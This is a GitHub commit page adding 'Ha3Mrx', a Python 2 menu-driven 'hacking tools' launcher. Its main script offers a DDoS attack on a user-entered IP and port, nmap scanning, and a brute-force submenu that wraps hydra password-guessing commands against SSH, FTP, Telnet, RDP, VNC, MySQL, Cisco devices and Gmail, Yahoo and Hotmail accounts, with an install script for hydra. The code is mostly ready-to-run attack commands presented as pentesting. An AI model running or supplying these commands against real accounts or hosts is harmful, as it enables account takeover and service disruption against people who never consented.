Skip to content

Commit 88186e7

Browse files
authored
Ha3Mrx Commit
1 parent 0ea276e commit 88186e7

File tree

9 files changed

+1437
-0
lines changed

9 files changed

+1437
-0
lines changed

Ha3Mrx/Core/__init__.py

Whitespace-only changes.

Ha3Mrx/Core/__init__.pyc

130 Bytes
Binary file not shown.

Ha3Mrx/Core/lzmcore.py

Lines changed: 790 additions & 0 deletions
Large diffs are not rendered by default.

Ha3Mrx/Core/lzmcore.pyc

37.4 KB
Binary file not shown.

Ha3Mrx/Ha3Mrx.py

Lines changed: 45 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
import os, sys, time
2+
from time import sleep as timeout
3+
def restart_program():
4+
python = sys.executable
5+
os.execl(python, python, * sys.argv)
6+
curdir = os.getcwd()
7+
os.system("clear")
8+
os.system("figlet Ha3MrX")
9+
print "Create By : Ha3MrX"
10+
print " [1]> Brute Force "
11+
print " [2]> DDos Attack "
12+
print " [3]> NMap PortScanner "
13+
print " [4]> Install Tools Hacking "
14+
print
15+
print " [0]> Exit "
16+
print
17+
A = raw_input("Ha3MrX ==>> ")
18+
19+
if A == "1" or A == "01":
20+
os.system("python2 brute.py")
21+
22+
elif A == "2" or A == "02":
23+
os.system("clear")
24+
os.system("figlet DDOS Attack")
25+
ip = raw_input("IP Address : ")
26+
port = raw_input("Port : ")
27+
packet =raw_input("Packet : ")
28+
os.system("python2 pntddos %s %s %s" % (ip, port, packet))
29+
30+
elif A == "3" or A == "03":
31+
os.system("clear")
32+
os.system("figlet NMap Scan")
33+
host = raw_input("Host : ")
34+
os.system("nmap %s" % (host))
35+
36+
elif A == "4" or A == "04":
37+
os.system("python2 lazymux.py")
38+
39+
elif A == "0" or A == "00":
40+
sys.exit()
41+
42+
else:
43+
print "\nERROR: Wrong Input"
44+
timeout(3)
45+
restart_program()

Ha3Mrx/README.md

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
# Hacking
2+
3+
### Ha3Mrx Pentesting and Security Hacking
4+
5+
### Best Hacking Tools
6+
7+
### A penetration test, or pen-test, is an attempt to evaluate the security of an IT infrastructure by safely trying to exploit vulnerabilities. These vulnerabilities may exist in operating systems, services and application flaws, improper configurations or risky end-user behavior. Such assessments are also useful in validating the efficacy of defensive mechanisms, as well as, end-user adherence to security policies

Ha3Mrx/brute.py

Lines changed: 140 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,140 @@
1+
import os, sys, time
2+
from time import sleep as timeout
3+
def restart_program():
4+
python = sys.executable
5+
os.execl(python, python, * sys.argv)
6+
curdir = os.getcwd()
7+
os.system("clear")
8+
os.system("figlet Brute Force")
9+
print
10+
print " [01]> Cisco Brute Force "
11+
print " [02]> VNC Brute Force "
12+
print " [03]> FTP Brute Force "
13+
print " [04]> Gmail Brute Force "
14+
print " [05]> SSH Brute Force "
15+
print " [06]> TeamSpeak Brute Force "
16+
print " [07]> Telnet Brute Force "
17+
print " [08]> Yahoo Mail Brute Force "
18+
print " [09]> Hotmail Brute Force "
19+
print " [10]> Router Speedy Brute Force "
20+
print " [11]> RDP Brute Force "
21+
print " [12]> MySQL Brute Force "
22+
print " [13]> Facebook Brute Force "
23+
print
24+
print " [00]> Exit"
25+
print
26+
bhydra = raw_input("Brute Force Console ==>> ")
27+
28+
if bhydra == '01' or bhydra == '1':
29+
os.system("clear")
30+
os.system("figlet Cisco Brute Force ")
31+
iphost = raw_input("[*] IP/Hostname : ")
32+
word = raw_input("[*] Wordlist : ")
33+
os.system("hydra -P %s %s cisco" % (word, iphost))
34+
sys.exit()
35+
36+
elif bhydra == '02' or bhydra == '2':
37+
os.system("clear")
38+
os.system("figlet VNC Brute Force")
39+
word = raw_input("[*] Wordlist : ")
40+
iphost = raw_input("[*] IP/Hostname : ")
41+
os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost))
42+
iphost = raw_input("[*] IP/Hostname : ")
43+
44+
elif bhydra == '03' or bhydra == '3':
45+
os.system("figlet FTP Brute Force")
46+
user = raw_input("[*] User : ")
47+
iphost = raw_input("[*] IP/Hostname : ")
48+
word = raw_input("[*] Wordlist : ")
49+
os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost))
50+
sys.exit()
51+
52+
elif bhydra == '04' or bhydra == '4':
53+
os.system("clear")
54+
os.system("figlet Gmail Brute Force")
55+
email = raw_input("[*] Email : ")
56+
word = raw_input("[*] Wordlist : ")
57+
os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word))
58+
sys.exit()
59+
60+
elif bhydra == '05' or bhydra == '5':
61+
os.system("clear")
62+
os.system("figlet SSH Brute Force")
63+
user = raw_input("[*] User : ")
64+
word = raw_input("[*] Wordlist : ")
65+
iphost = raw_input("[*] IP/Hostname : ")
66+
os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost))
67+
sys.exit()
68+
69+
elif bhydra == '06' or bhydra == '6':
70+
os.system("clear")
71+
os.system("figlet TeamSpeak Brute Force")
72+
user = raw_input("[*] User : ")
73+
word = raw_input("[*] Wordlist : ")
74+
iphost = raw_input("[*] IP/Hostname : ")
75+
os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost))
76+
sys.exit()
77+
78+
elif bhydra == '07' or bhydra == '7':
79+
os.system("clear")
80+
os.system("figlet Telnet Brute Force")
81+
user = raw_input("[*] User : ")
82+
word = raw_input("[*] Wordlist : ")
83+
iphost = raw_input("[*] IP/Hostname : ")
84+
os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost))
85+
sys.exit()
86+
87+
elif bhydra == '08' or bhydra == '8':
88+
os.system("clear")
89+
os.system("Yahoo Brute Force")
90+
email = raw_input("[*] Email : ")
91+
word = raw_input("[*] Wordlist : ")
92+
os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word))
93+
sys.exit()
94+
95+
elif bhydra == '09' or bhydra == '9':
96+
os.system("clear")
97+
os.system("figlet Hotmail Brute Force")
98+
email = raw_input("[*] Email : ")
99+
word = raw_input("[*] Wordlist : ")
100+
os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word))
101+
sys.exit()
102+
103+
elif bhydra == '10':
104+
os.system("clear")
105+
os.system("figlet Router Speedy Brute Force")
106+
user = raw_input("[*] User : ")
107+
word = raw_input("[*] Wordlist : ")
108+
iphost = raw_input("[*] IP/Hostname : ")
109+
os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost))
110+
sys.exit()
111+
112+
elif bhydra == '11':
113+
os.system("clear")
114+
os.system("figlet PDR Brute Force")
115+
user = raw_input("[*] User : ")
116+
word = raw_input("[*] Wordlist : ")
117+
iphost = raw_input("[*] IP/Hostname : ")
118+
os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost))
119+
sys.exit()
120+
121+
elif bhydra == '12':
122+
os.syatem("clear")
123+
os.system("figlet My SQL Brute Force")
124+
user = raw_input("[*] User : ")
125+
word = raw_input("[*] Wordlist : ")
126+
os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word))
127+
128+
elif bhydra == "13":
129+
os.system("clear")
130+
os.system("figlet Facebook Brute Force")
131+
os.system("python2 facebook")
132+
133+
134+
elif bhydra == '00' or bhydra == '0':
135+
os.system("python2 Ha3MrX.py")
136+
137+
else:
138+
print "\n[!] ERROR : Wrong Input"
139+
time.sleep(1)
140+
restart_program()

Ha3Mrx/install.sh

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
apt-get upgrade && apt-get update
2+
apt-get install git -y
3+
apt-get install python -y && apt-get install python2 -y
4+
apt-get install hydra -y
5+
apt-get install figlet -y
6+
apt-get dist-upgrade
7+
figlet Tools is Installed
8+
echo How to use Ha3MrX
9+
echo Command : python Ha3Mrx.py

0 commit comments

Comments
 (0)